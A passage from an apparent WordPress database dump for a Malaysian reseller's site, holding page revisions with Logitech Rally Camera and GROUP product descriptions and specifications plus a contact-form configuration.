src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n\r\n[maxbutton id=\"3\" ]','Logitech Rally Camera','','inherit','closed','closed','','2885-revision-v1','','','2019-03-04 15:00:24','2019-03-04 07:00:24','',2885,'https://bintara.com.my/blog/2019/03/04/2885-revision-v1/',0,'revision','',0),(2904,1,'2019-02-14 14:51:45','2019-02-14 06:51:45','<h3>Rally Camera</h3><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control.</p><ul><li>RightSenseâ„¢ technology automates a better user experience</li><li>Advanced optics frame every participant with amazing clarity</li><li>Sleek industrial design for any professional meeting space</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Peerless Performance. Exceptional Versatility.</h3><p><br />With premium industrial design and an Ultra-HD imaging system, Rally Camera tops the lineup of standalone video cameras from LogitechÂ®. Packed with advanced optics and breakthrough technologies, Rally Camera delivers premium performance in professional meeting spaces of all shapes and sizes. With whisper-quiet mechanical Pan/Tilt/Zoom, razor-sharp 15X HD zoom, expansive 90Â° field of view, and powerful 4K sensor, Rally Camera captures every person in the room with truly phenomenal video quality.</p>https://youtu.be/TWRoAslIm0c<h3>STUDIO-QUALITY VIDEO</h3><p>With an Ultra-HD imaging system, Rally Camera delivers brilliantly sharp video, outstanding colour, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLightâ„¢ technology optimises light balance to emphasise faces and render natural-looking skin tones, even in dim or backlit conditions.</p><h3>SLEEK INDUSTRIAL DESIGN</h3><p>Rally Camera incorporates world-class Logitech optics and 4K sensor in a premium industrial design suitable for any professional setting. Elegantly finished in matte black with slate gray metal trim, Rally Camera can be positioned on a table, mounted on a tripod, or secured to a wall with included hardware. For overhead installations, the camera detects when itâ€™s inverted and automatically corrects image orientation and camera controls.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SEE EVERYONE, PERFECTLY FRAMED</h3><p>Logitech RightSightâ„¢ camera control automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.</p><p>Future Availability: RightSight will be enabled by a software download, with initial support for Windows 10.</p>https://youtu.be/-xGIqpPOyXs<h3>ENHANCED USER EXPERIENCE</h3><p>Logitech RightSenseâ„¢ is a suite of proactive technologies built into Rally Camera that automate a better user experience. RightSightâ„¢ automates camera control to perfectly frame participants, no matter their distance from the lens. RightLightâ„¢ optimises light balance and prioritises faces over objects and surfaces to render natural-looking skin tones. Plus, Rally Camera is compatible with virtually any video conferencing app right out of the box.</p><h3>PRIVACY ASSURANCE</h3><p>When Rally Camera is not in use, the lens defaults to a parked position where the lens is pointed straight down. This provides visual affirmation that the camera is unable to â€œseeâ€ anything in the meeting space when idle. The lens lifts to a preset position when joining a meeting and parks automatically when the meeting ends. In addition, whenever video is muted during a meeting, a status light illuminates red to affirm visual privacy.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-camera-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<p>[maxbutton id=\"3\" ]</p>','Logitech Rally Camera','','inherit','closed','closed','','2885-revision-v1','','','2019-02-14 14:51:45','2019-02-14 06:51:45','',2885,'https://bintara.com.my/blog/2019/02/14/2885-revision-v1/',0,'revision','',0),(1247,1,'2018-12-11 01:47:49','2018-12-11 01:47:49','','rally-camera','','inherit','open','closed','','rally-camera','','','2018-12-11 01:47:49','2018-12-11 01:47:49','',0,'https://bintara.com.my/wp-content/uploads/2018/12/rally-camera.png',0,'attachment','image/png',0),(1249,1,'2018-12-11 01:49:00','2018-12-11 01:49:00','','rally-system-b2b-pdp','','inherit','open','closed','','rally-system-b2b-pdp','','','2018-12-11 01:49:00','2018-12-11 01:49:00','',0,'https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png',0,'attachment','image/png',0),(1251,1,'2018-12-11 01:50:07','2018-12-11 01:50:07','{\"id\":\"1251\",\"field_id\":5,\"fields\":{\"0\":{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"1\":{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"text\",\"label\":\"Company Name\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\",\"input_mask\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"number\",\"label\":\"Phone Numbers\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"Message\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\"}},\"settings\":{\"form_title\":\"Contact Us\",\"form_desc\":\"\",\"form_class\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"submit_class\":\"\",\"honeypot\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Contact Us\",\"sender_name\":\"{field_id=\\\"0\\\"}\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"6\",\"redirect\":\"\"}}},\"meta\":{\"template\":\"contact\"}}','Contact Us','','publish','closed','closed','','contact-us','','','2018-12-11 02:06:26','2018-12-11 02:06:26','',0,'https://bintara.com.my/?post_type=wpforms&#038;p=1251',0,'wpforms','',0),(1253,1,'2018-12-11 01:51:33','2018-12-11 01:51:33','[wpforms id=\"1251\" title=\"false\" description=\"false\"]','Contact Us','','inherit','closed','closed','','19-revision-v1','','','2018-12-11 01:51:33','2018-12-11 01:51:33','',19,'https://bintara.com.my/blog/2018/12/11/19-revision-v1/',0,'revision','',0),(1277,1,'2018-12-11 10:55:02','2018-12-11 02:55:02','','PRODUCTS & SERVICES','','publish','closed','closed','','products-services','','','2018-12-11 10:55:02','2018-12-11 02:55:02','',0,'https://bintara.com.my/?page_id=1277',0,'page','',0),(2531,1,'2018-12-19 11:39:09','2018-12-19 03:39:09','','PA-5000','','inherit','closed','closed','','pa-5000','','','2018-12-19 11:39:09','2018-12-19 03:39:09','',1569,'https://bintara.com.my/wp-content/uploads/2018/12/PA-5000.jpg',0,'attachment','image/jpeg',0),(1288,1,'2018-12-11 11:00:21','2018-12-11 03:00:21','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">GROUP</h1>\r\n<h1><img class=\"alignnone size-full wp-image-1242\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" width=\"687\" height=\"600\" /></h1>\r\n<p class=\"product-details\">Affordable video conferencing for mid to large-sized meeting rooms</p>\r\n\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<ul class=\"top-features \">\r\n 	<li class=\"top-feature\">See every detail with HD video and 10x zoom</li>\r\n 	<li class=\"top-feature\">Works with your meeting and video conferencing applications</li>\r\n 	<li class=\"top-feature\">Crystal-clear audio for up to 20 participants</li>\r\n</ul>\r\n<strong>DIMENSIONS</strong>\r\n\r\n<strong>Camera:</strong>\r\n\r\nHeight x Width x Depth: 5.12 in (130 mm) x 7.0 in (170 mm) x 5.40 in (138 mm)\r\n\r\nWeight: 1.31lb (585 g)\r\n\r\n<strong>Speakerphone:</strong>\r\n\r\nHeight x Width x Depth: 9.5 in (240 mm ) xÂ  2.5 in (65 mm ) x 9.5 in (240 mm )\r\n\r\nWeight: 2.68 lb (1223 g)\r\n\r\n<strong>Hub:</strong>\r\n\r\nHeight x Width x Depth: 3.75 in (94 mm) x 1.3 in (34 mm) x 2.9 in (74 mm)\r\n\r\nWeight: 3.0 oz (83 g)\r\n\r\n<strong>Remote:</strong>\r\n\r\nHeight x Width x Depth: 2.0 in (50 mm) x 5.0 in(120 mm) x 0.5 in (12 mm)\r\n\r\nWeight: 2.0 ozÂ  (51 g)\r\n\r\n<strong>Wall/Table Mount:</strong>\r\n\r\nHeight x Width x Depth: 8.27 in (210 mm) x 4.72 in (120 mm) x 3.9 in (99 mm)\r\n\r\nWeight: 8.99 oz (255 g)\r\n\r\n<strong>Expansion Mics (Optional):</strong>\r\n\r\nHeight x Width x Depth: 3.30 in (83 mm) x 3.30 in (83 mm) x 0.83 in (21 mm)\r\n\r\nWeight: 8.0 oz 230 g)\r\n\r\n&nbsp;\r\n\r\n<strong>SYSTEM REQUIREMENTS</strong>\r\n<ul>\r\n 	<li>WindowsÂ® 7, 8.1 or 10</li>\r\n 	<li>macOS 10.10 or higher</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<strong>TECHNICAL SPECIFICATIONS</strong>\r\n\r\n<strong>CAMERA</strong>\r\n<ul>\r\n 	<li>Smooth motorized pan, tilt and zoom controlled from remote or console</li>\r\n 	<li>260Â° pan</li>\r\n 	<li>130Â° tilt</li>\r\n 	<li>10x lossless HD zoom</li>\r\n 	<li>90Â° field of view</li>\r\n 	<li>Full HD 1080p 30fps</li>\r\n 	<li>264 UVC 1.5 with Scalable Video Coding (SVC)</li>\r\n 	<li>Autofocus</li>\r\n 	<li>5 camera presets</li>\r\n 	<li>Far-end control (PTZ) of ConferenceCam product (with supported services)</li>\r\n 	<li>Kensington security slot</li>\r\n 	<li>Video mute/unmute LED indicator</li>\r\n 	<li>Standard tripod thread</li>\r\n</ul>\r\n<strong>REMOTE CONTROL</strong>\r\n<ul>\r\n 	<li>Camera, speakerphone, and call control</li>\r\n 	<li>5 camera presets</li>\r\n 	<li>Docks on speakerphone</li>\r\n 	<li>IR 8.5 m/28-foot range</li>\r\n 	<li>CR2032 battery (included)</li>\r\n</ul>\r\n<strong>SPEAKERPHONE</strong>\r\n<ul>\r\n 	<li>Full-duplex performance</li>\r\n 	<li>Acoustic echo cancellation</li>\r\n 	<li>Noise reduction technology</li>\r\n 	<li>Ultra-wideband audio</li>\r\n 	<li>Pairs with mobile devices via Bluetooth and NFC</li>\r\n 	<li>LCD for caller ID, call duration and other functional response</li>\r\n 	<li>LEDs for speakerphone streaming, mute, hold, and Bluetooth</li>\r\n 	<li>Tactile buttons for call answer/end, volume and mute, Bluetooth, and camera controls</li>\r\n 	<li>5 camera presets for pan, tilt, and zoom settings</li>\r\n 	<li>Kensington security slot</li>\r\n</ul>\r\n<strong>MICROPHONES</strong>\r\n<ul>\r\n 	<li>Pickup range: 6m / 20 ft</li>\r\n 	<li>Pickup range with expansion mics: 8.5 m / 28 ft</li>\r\n 	<li>Four omnidirectional, beamforming microphones</li>\r\n 	<li>Frequency response: 100Hz â€“ 11KHz</li>\r\n 	<li>Sensitivity: -28dB +/-3dB</li>\r\n 	<li>Distortion: &lt;5% from 200Hz</li>\r\n</ul>\r\n<strong>HUB / CABLES / POWER</strong>\r\n<ul>\r\n 	<li>Central Hub connects and powers all components</li>\r\n 	<li>Under-table mounting adhesive included</li>\r\n 	<li>One cable to camera: 5 m / 16 ft</li>\r\n 	<li>One cable to speakerphone: 5 m /16 ft</li>\r\n 	<li>Extended cables available (10 m and 15 m)</li>\r\n 	<li>One USB cable for connection to PC/Mac (2 m / 6.6 ft)</li>\r\n 	<li>AC Power adapter with regional plugs</li>\r\n 	<li>Power cable (3 m / 9.8 ft)</li>\r\n</ul>\r\n<strong>MOUNT</strong>\r\n\r\nDual-purpose bracket works for both wall mounting and tabletop elevation\r\n\r\n<strong>COMPATIBILITY AND INTEGRATIONS</strong>\r\n<ul>\r\n 	<li>Plug-and-play USB connectivity</li>\r\n 	<li>Works with most any video conferencing application or meetings service</li>\r\n 	<li>Skype for Business certified</li>\r\n 	<li>Microsoft CortanaÂ® certified</li>\r\n 	<li>Cisco JabberÂ® and WebEx compatible</li>\r\n 	<li>Enhanced integration with Logitech Collaboration Program (LCP) members, including BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom</li>\r\n</ul>\r\n<strong>PACKAGE CONTENTS</strong>\r\n<ul>\r\n 	<li>Camera</li>\r\n 	<li>Speakerphone</li>\r\n 	<li>Remote control</li>\r\n 	<li>Two 5m / 16.4 ft cables for connection between speakerphone and hub and camera and hub</li>\r\n 	<li>One 2m / 6.6 ft meter cable between hub and PC</li>\r\n 	<li>Velcro for cable management</li>\r\n 	<li>Velcro for hub to table securing</li>\r\n 	<li>Powered hub</li>\r\n 	<li>Power adapter with regional plugs and 3m / 9.8 ft cable</li>\r\n 	<li>Mount</li>\r\n 	<li>Documentation</li>\r\n 	<li>Warranty card</li>\r\n</ul>\r\n<strong>WARRANTY INFORMATION</strong>\r\n\r\n2-Year Limited Hardware Warranty\r\n\r\n[maxbutton id=\"1\"]\r\n\r\n</div>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2018-12-11 11:00:21','2018-12-11 03:00:21','',16,'https://bintara.com.my/blog/2018/12/11/16-revision-v1/',0,'revision','',0),(1256,1,'2018-12-11 10:10:50','2018-12-11 02:10:50','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">GROUP</h1>\r\n<h1><img class=\"alignnone size-full wp-image-1242\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" width=\"687\" height=\"600\" /></h1>\r\n<p class=\"product-details\">Affordable video conferencing for mid to large-sized meeting rooms</p>\r\n\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<ul class=\"top-features \">\r\n 	<li class=\"top-feature\">See every detail with HD video and 10x zoom</li>\r\n 	<li class=\"top-feature\">Works with your meeting and video conferencing applications</li>\r\n 	<li class=\"top-feature\">Crystal-clear audio for up to 20 participants</li>\r\n</ul>\r\n<strong>DIMENSIONS</strong>\r\n\r\n<strong>Camera:</strong>\r\n\r\nHeight x Width x Depth: 5.12 in (130 mm) x 7.0 in (170 mm) x 5.40 in (138 mm)\r\n\r\nWeight: 1.31lb (585 g)\r\n\r\n<strong>Speakerphone:</strong>\r\n\r\nHeight x Width x Depth: 9.5 in (240 mm ) xÂ  2.5 in (65 mm ) x 9.5 in (240 mm )\r\n\r\nWeight: 2.68 lb (1223 g)\r\n\r\n<strong>Hub:</strong>\r\n\r\nHeight x Width x Depth: 3.75 in (94 mm) x 1.3 in (34 mm) x 2.9 in (74 mm)\r\n\r\nWeight: 3.0 oz (83 g)\r\n\r\n<strong>Remote:</strong>\r\n\r\nHeight x Width x Depth: 2.0 in (50 mm) x 5.0 in(120 mm) x 0.5 in (12 mm)\r\n\r\nWeight: 2.0 ozÂ  (51 g)\r\n\r\n<strong>Wall/Table Mount:</strong>\r\n\r\nHeight x Width x Depth: 8.27 in (210 mm) x 4.72 in (120 mm) x 3.9 in (99 mm)\r\n\r\nWeight: 8.99 oz (255 g)\r\n\r\n<strong>Expansion Mics (Optional):</strong>\r\n\r\nHeight x Width x Depth: 3.30 in (83 mm) x 3.30 in (83 mm) x 0.83 in (21 mm)\r\n\r\nWeight: 8.0 oz 230 g)\r\n\r\n&nbsp;\r\n\r\n<strong>SYSTEM REQUIREMENTS</strong>\r\n<ul>\r\n 	<li>WindowsÂ® 7, 8.1 or 10</li>\r\n 	<li>macOS 10.10 or higher</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<strong>TECHNICAL SPECIFICATIONS</strong>\r\n\r\n<strong>CAMERA</strong>\r\n<ul>\r\n 	<li>Smooth motorized pan, tilt and zoom controlled from remote or console</li>\r\n 	<li>260Â° pan</li>\r\n 	<li>130Â° tilt</li>\r\n 	<li>10x lossless HD zoom</li>\r\n 	<li>90Â° field of view</li>\r\n 	<li>Full HD 1080p 30fps</li>\r\n 	<li>264 UVC 1.5 with Scalable Video Coding (SVC)</li>\r\n 	<li>Autofocus</li>\r\n 	<li>5 camera presets</li>\r\n 	<li>Far-end control (PTZ) of ConferenceCam product (with supported services)</li>\r\n 	<li>Kensington security slot</li>\r\n 	<li>Video mute/unmute LED indicator</li>\r\n 	<li>Standard tripod thread</li>\r\n</ul>\r\n<strong>REMOTE CONTROL</strong>\r\n<ul>\r\n 	<li>Camera, speakerphone, and call control</li>\r\n 	<li>5 camera presets</li>\r\n 	<li>Docks on speakerphone</li>\r\n 	<li>IR 8.5 m/28-foot range</li>\r\n 	<li>CR2032 battery (included)</li>\r\n</ul>\r\n<strong>SPEAKERPHONE</strong>\r\n<ul>\r\n 	<li>Full-duplex performance</li>\r\n 	<li>Acoustic echo cancellation</li>\r\n 	<li>Noise reduction technology</li>\r\n 	<li>Ultra-wideband audio</li>\r\n 	<li>Pairs with mobile devices via Bluetooth and NFC</li>\r\n 	<li>LCD for caller ID, call duration and other functional response</li>\r\n 	<li>LEDs for speakerphone streaming, mute, hold, and Bluetooth</li>\r\n 	<li>Tactile buttons for call answer/end, volume and mute, Bluetooth, and camera controls</li>\r\n 	<li>5 camera presets for pan, tilt, and zoom settings</li>\r\n 	<li>Kensington security slot</li>\r\n</ul>\r\n<strong>MICROPHONES</strong>\r\n<ul>\r\n 	<li>Pickup range: 6m / 20 ft</li>\r\n 	<li>Pickup range with expansion mics: 8.5 m / 28 ft</li>\r\n 	<li>Four omnidirectional, beamforming microphones</li>\r\n 	<li>Frequency response: 100Hz â€“ 11KHz</li>\r\n 	<li>Sensitivity: -28dB +/-3dB</li>\r\n 	<li>Distortion: &lt;5% from 200Hz</li>\r\n</ul>\r\n<strong>HUB / CABLES / POWER</strong>\r\n<ul>\r\n 	<li>Central Hub connects and powers all components</li>\r\n 	<li>Under-table mounting adhesive included</li>\r\n 	<li>One cable to camera: 5 m / 16 ft</li>\r\n 	<li>One cable to speakerphone: 5 m /16 ft</li>\r\n 	<li>Extended cables available (10 m and 15 m)</li>\r\n 	<li>One USB cable for connection to PC/Mac (2 m / 6.6 ft)</li>\r\n 	<li>AC Power adapter with regional plugs</li>\r\n 	<li>Power cable (3 m / 9.8 ft)</li>\r\n</ul>\r\n<strong>MOUNT</strong>\r\n\r\nDual-purpose bracket works for both wall mounting and tabletop elevation\r\n\r\n<strong>COMPATIBILITY AND INTEGRATIONS</strong>\r\n<ul>\r\n 	<li>Plug-and-play USB connectivity</li>\r\n 	<li>Works with most any video conferencing application or meetings service</li>\r\n 	<li>Skype for Business certified</li>\r\n 	<li>Microsoft CortanaÂ® certified</li>\r\n 	<li>Cisco JabberÂ® and WebEx compatible</li>\r\n 	<li>Enhanced integration with Logitech Collaboration Program (LCP) members, including BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom</li>\r\n</ul>\r\n<strong>PACKAGE CONTENTS</strong>\r\n<ul>\r\n 	<li>Camera</li>\r\n 	<li>Speakerphone</li>\r\n 	<li>Remote control</li>\r\n 	<li>Two 5m / 16.4 ft cables for connection between speakerphone and hub and camera and hub</li>\r\n 	<li>One 2m / 6.6 ft meter cable between hub and PC</li>\r\n 	<li>Velcro for cable management</li>\r\n 	<li>Velcro for hub to table securing</li>\r\n 	<li>Powered hub</li>\r\n 	<li>Power adapter with regional plugs and 3m / 9.8 ft cable</li>\r\n 	<li>Mount</li>\r\n 	<li>Documentation</li>\r\n 	<li>Warranty card</li>\r\n</ul>\r\n<strong>WARRANTY INFORMATION</strong>\r\n\r\n2-Year Limited Hardware Warranty\r\n\r\n[maxbutton id=\"1\"]\r\n\r\n</div>','Logitech Group','','inherit','closed','closed','','16-revision-v1','','','2018-12-11 10:10:50','2018-12-11 02:10:50','',16,'https://bintara.com.my/blog/2018/12/11/16-revision-v1/',0,'revision','',0),(2900,1,'2019-02-14 14:39:41','2019-02-14 06:39:41','','conferencecam-group','','inherit','closed','closed','','conferencecam-group-2','','','2019-02-14 14:39:41','2019-02-14 06:39:41','',2000,'https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group.jpg',0,'attachment','image/jpeg',0),(2901,1,'2019-02-14 14:41:32','2019-02-14 06:41:32','','conferencecam-group (1)','','inherit','closed','closed','','conferencecam-group-1','','','2019-02-14 14:41:32','2019-02-14 06:41:32','',2000,'https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-1.jpg',0,'attachment','image/jpeg',0),(2902,1,'2019-02-14 14:42:31','2019-02-14 06:42:31','','conferencecam-group (2)','','inherit','closed','closed','','conferencecam-group-2-2','','','2019-02-14 14:42:31','2019-02-14 06:42:31','',2000,'https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-2.jpg',0,'attachment','image/jpeg',0),(2909,1,'2019-02-14 15:01:08','2019-02-14 07:01:08','<h3>GROUP</h3>\r\nAffordable video conferencing for mid to large-sized meeting rooms\r\n<ul>\r\n 	<li>See every detail with HD video and 10x zoom</li>\r\n 	<li>Works with your meeting and video conferencing applications</li>\r\n 	<li>Crystal-clear audio for up to 20 participants</li>\r\n</ul>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" sizes=\"(max-width: 687px) 100vw, 687px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" alt=\"\" width=\"687\" height=\"600\" />\r\n<h4>KEY FEATURES</h4>\r\nhttps://youtu.be/vOMW9wEaoqo\r\n<h3>PERFECT FOR LARGER ROOMS</h3>\r\nGROUP, our video conferencing solution for rooms that seat 14â€“20 people, delivers high quality HD video and crystal clear audio, allowing any meeting place to be a video collaboration space. With advanced features like acoustic echo cancellation, noise reduction technology, and intuitive controls, itâ€™s easier than ever to include everyone in the conversation.\r\n<h3>PLUG-AND-PLAY SIMPLICITY</h3>\r\nUSB plug-and-play connectivity makes GROUP a breeze to deploy and use. Simply connect GROUP the conference room computer or your laptop through USB, and youâ€™re good to go. Use GROUP with any video conferencing software, including those you already use. For great-sounding audio calls, pair your mobile device with BluetoothÂ® wireless technology to the GROUP speakerphone.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-1.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-1-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<h3>HIGH-DEFINITION VIDEO</h3>\r\nBring meetings into focus with GROUPâ€™s premium lens, 10x lossless zoom, and HD 1080p/30 performance. Perfectly frame presenters and whiteboards with pan/tilt control, and zoom in for detail and clarity. GROUPâ€™s 90Â° field-of-view provides ideal coverage for medium and large conference rooms, with motorized pan and tilt for wall-to-wall, floor-to-ceiling coverage.\r\n<h3>NATURAL-SOUNDING AUDIO</h3>\r\nEveryone hears and can be heard with GROUPâ€™s full-duplex speakerphone, which delivers sound thatâ€™s crisp, clear, and highly intelligible. Acoustic echo cancellation and noise reduction technology make conversations natural-sounding while reducing reverberation and ambient noise.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-2.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-2-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<h4>ADDITIONAL FEATURES</h4>\r\n<h4>SPEAKERPHONE WITH BLUETOOTH</h4>\r\nHear and be heard with life-like clarity. GROUPâ€™s full-duplex speakerphone provides 360Â° coverage with four omnidirectional mics. Beamforming technology helps pick up speech throughout a 6m / 20 ft diameter while reducing keyboard clicks and other audible distractions. You can even pair GROUP with your smartphone or tablet to enjoy outstanding audio clarity and ample volume with mobile applications and conference calls.\r\n<h4>CERTIFIED FOR BUSINESS</h4>\r\nGROUP offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business, Microsoft CortanaÂ®, Cisco Jabberâ„¢ compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with GROUP.\r\n<h4>CONVENIENT CONTROLS</h4>\r\nGROUPâ€™s speakerphone provides a convenient dock for the handheld remote control, and features an LCD status screen and tactile buttons to mute audio, adjust volume, move the camera, and more.\r\n<h4>AVAILABLE EXPANSION MICS</h4>\r\nExtend the range of the GROUP video conferencing system with Logitech GROUP Expansion Mics. Accommodate up to 20 people in one large room and make sure everyoneâ€™s voice can be heard. Simply plug the microphones into the GROUP speakerphone: they are automatically recognized and configured. An indicator light shows when the microphone is muted, when a call is active, and when Bluetooth wireless pairing has begun.\r\n<h4>MUTE WITH CONFIDENCE</h4>\r\nWith tactile mute buttons on the speakerphone, handheld remote, and optional expansion mics, GROUP makes it easy to assure your privacy. When muted, GROUPâ€™s LED status ring lights up red, a subtle yet obvious assurance thatâ€™s easily seen throughout the room.\r\n<h4>CABLING MADE EASY</h4>\r\nGROUPâ€™s compact Hub simplifies cabling and makes it easy to run cables under tables and through conduit. Integrated data and power means that the camera and speakerphone each connect with a single cable. The included 5m / 16 ft cables give you lots of placement options, while optional extended cables offer double or triple the reach.\r\n<h4>FIELD UPGRADEABLE</h4>\r\nWith regular firmware updates, Logitech continuously improves the GROUP video conferencing experience. For example, recent updates delivered substantial improvements to automatic echo cancellation and gain control, plus upgraded beamforming and duplex performance. Itâ€™s another reason why Logitech delivers the best value proposition in the industry.\r\n\r\n[maxbutton id=\"3\" ]','LOGITECH GROUP','','inherit','closed','closed','','2000-revision-v1','','','2019-02-14 15:01:08','2019-02-14 07:01:08','',2000,'https://bintara.com.my/blog/2019/02/14/2000-revision-v1/',0,'revision','',0),(2903,1,'2019-02-14 14:50:48','2019-02-14 06:50:48','<h3>GROUP</h3><p>Affordable video conferencing for mid to large-sized meeting rooms</p><ul><li>See every detail with HD video and 10x zoom</li><li>Works with your meeting and video conferencing applications</li><li>Crystal-clear audio for up to 20 participants</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n			<h4>KEY FEATURES</h4>		\n		https://youtu.be/vOMW9wEaoqo<h3>PERFECT FOR LARGER ROOMS</h3><p>GROUP, our video conferencing solution for rooms that seat 14â€“20 people, delivers high quality HD video and crystal clear audio, allowing any meeting place to be a video collaboration space. With advanced features like acoustic echo cancellation, noise reduction technology, and intuitive controls, itâ€™s easier than ever to include everyone in the conversation.</p><h3>PLUG-AND-PLAY SIMPLICITY</h3><p>USB plug-and-play connectivity makes GROUP a breeze to deploy and use. Simply connect GROUP the conference room computer or your laptop through USB, and youâ€™re good to go. Use GROUP with any video conferencing software, including those you already use. For great-sounding audio calls, pair your mobile device with BluetoothÂ® wireless technology to the GROUP speakerphone.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-300x169.jpg 300w, 